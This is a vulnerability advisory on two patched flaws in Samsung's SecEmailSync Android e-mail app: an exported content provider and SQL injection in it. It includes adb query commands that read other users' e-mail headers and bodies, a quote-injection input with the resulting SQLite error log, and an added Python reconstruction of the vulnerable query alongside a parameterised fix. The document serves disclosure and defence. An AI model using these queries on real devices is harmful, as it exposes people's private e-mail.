- Authors: Roberto Paleari (@rpaleari) and Aristide Fattori (@joystick)
- Samsung ID: SVE-2015-5081
- ID: CVE-2016-2565 and CVE-2016-2566
- Notification date: 29/10/2015
- Release date: 02/02/2016
We identified some vulnerabilities and insecure settings in Samsung's proprietary e-mail application, SecEmailSync, distributed with recent Android-based Samsung phones. These vulnerabilities can be exploited by any local application to access a victim's e-mail messages. The attacker App does not require any specific privilege, so the attack is quite stealthy.
Recent Samsung Android phones include a proprietary application, named SecEmailSync (package com.samsung.android.email.sync). This App exposes multiple services and content providers, some of which are accessible by any unprivileged local application.
Among these, we focused on the content provider .homecard.OtherProvider. The relevant manifest entry follows:
<provider android:authorities="com.samsung.android.email.otherprovider" android:exported="true"
android:name="com.samsung.android.email.sync.homecard.OtherProvider"/>
As can be seen from this snippet, this provider is exported and can thus be queried by any other local application, without requiring any specific privilege (CVE-2016-2565).
We investigated the inner workings of this provider and found that it can be abused to access e-mail messages handled by Samsung's proprietary e-mail application (SecEmail).
As an example, the following ADB command demonstrates how it is possible to query the content provider to extract the e-mails sent by a given sender (in this case, bobby@mysite.it):
$ adb shell content query --uri content://com.samsung.android.email.otherprovider/header --where bobby@mysite.it
Row: 0 timeStamp=1446119267000, subject=Test email, _id=1997
The URI content://com.samsung.android.email.otherprovider/body also gives access to the e-mail body:
$ adb shell content query --uri content://com.samsung.android.email.otherprovider/body --where bobby@mysite.it
Row: 0 htmlContent=NULL, textContent=Email body
It is not even necessary to know the e-mail address of a valid sender, as passing "@" as the e-mail address suffices to match all the e-mails available.
Even worse, the very same content provider is affected by a SQL injection (SQLi) issue (CVE-2016-2566). As an example, the following query triggers the vulnerability:
$ adb shell content query --uri content://com.samsung.android.email.otherprovider/body --where "test@me'"
When this query is processed, the following messages are recorded in the Android logs (logs have been truncated due to space constraints):
E/DatabaseUtils( 5454): android.database.sqlite.SQLiteException: unrecognized token: "') ORDER BY timeStamp COLLATE NOCASE DESC LIMIT 10" (code 1): , while compiling: SELECT timeStamp, subject, _id FROM Message WHERE (fromList like '%test@me'%') ORDER BY timeStamp COLLATE NOCASE DESC LIMIT 10
E/DatabaseUtils( 5454): #################################################################
E/DatabaseUtils( 5454): Error Code : 1 (SQLITE_ERROR)
E/DatabaseUtils( 5454): Caused By : SQL(query) error or missing database.
E/DatabaseUtils( 5454): (unrecognized token: "') ORDER BY timeStamp COLLATE NOCASE DESC LIMIT 10" (code 1): , while compiling: SELECT timeStamp, subject, _id FROM Message WHERE (fromList like '%test@me'%') ORDER BY timeStamp COLLATE NOCASE DESC LIMIT 10)
E/DatabaseUtils( 5454): #################################################################
E/DatabaseUtils( 5454): at android.database.sqlite.SQLiteConnection.nativePrepareStatement(Native Method)
....
E/DatabaseUtils( 5454): at com.samsung.android.email.provider.provider.database.AbsEmailProvider.query(AbsEmailProvider.java:1986)
The SQLi can obviously be exploited to extract arbitrary data from the SQL tables managed by the content provider.
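The root cause visible in the log above is the caller-supplied "where" value being pasted into the LIKE pattern as SQL text. The following added example (ours, not Samsung's code) reconstructs that statement against a constructed in-memory SQLite table with the same columns, reproduces the "unrecognized token" failure, and shows the parameterised form a provider should use instead; the table contents and helper names are assumptions.

```python
import sqlite3

# Constructed stand-in for the Message table named in the log (columns taken from
# the logged statement); this is not Samsung's real schema or data.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Message (_id INTEGER PRIMARY KEY, timeStamp INTEGER, "
               "subject TEXT, fromList TEXT)")
    db.executemany("INSERT INTO Message VALUES (?, ?, ?, ?)", [
        (1997, 1446119267000, "Test email", "bobby@mysite.it"),
        (1998, 1446119300000, "Other", "alice@example.org"),
    ])
    return db

# Vulnerable pattern, reconstructed from the statement in the log: the sender string
# is concatenated into the SQL, so a single quote changes the statement itself.
def query_header_vulnerable(db, sender):
    sql = ("SELECT timeStamp, subject, _id FROM Message WHERE (fromList like '%"
           + sender + "%') ORDER BY timeStamp COLLATE NOCASE DESC LIMIT 10")
    return db.execute(sql).fetchall()

# Hardened form: the value is bound as a parameter and can never be parsed as SQL.
# Note that LIKE wildcards still apply, so "@" still matches every row; that is the
# exported-provider problem (CVE-2016-2565), which needs android:exported="false" or
# a permission on the provider, not a query-level fix.
def query_header_safe(db, sender):
    sql = ("SELECT timeStamp, subject, _id FROM Message WHERE (fromList like ?) "
           "ORDER BY timeStamp COLLATE NOCASE DESC LIMIT 10")
    return db.execute(sql, ("%" + sender + "%",)).fetchall()

def sqli_error_message(db, sender):
    """Return the SQLite error text raised by the vulnerable query, or None."""
    try:
        query_header_vulnerable(db, sender)
        return None
    except sqlite3.OperationalError as e:
        return str(e)

if __name__ == "__main__":
    db = make_db()
    print(query_header_vulnerable(db, "bobby@mysite.it"))
    print(sqli_error_message(db, "test@me'"))   # the advisory's failing input
    print(query_header_safe(db, "test@me'"))    # same input, bound: no error, no rows
```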
We confirm these issues affect the following device models. Other models and firmware versions are probably affected as well, but they were not tested.
- SM-G920F, build G920FXXU2COH2 (Galaxy S6)
The vulnerabilities discussed in this advisory have already been patched by Samsung, in their January Android Security Update (SMR-JAN-2016).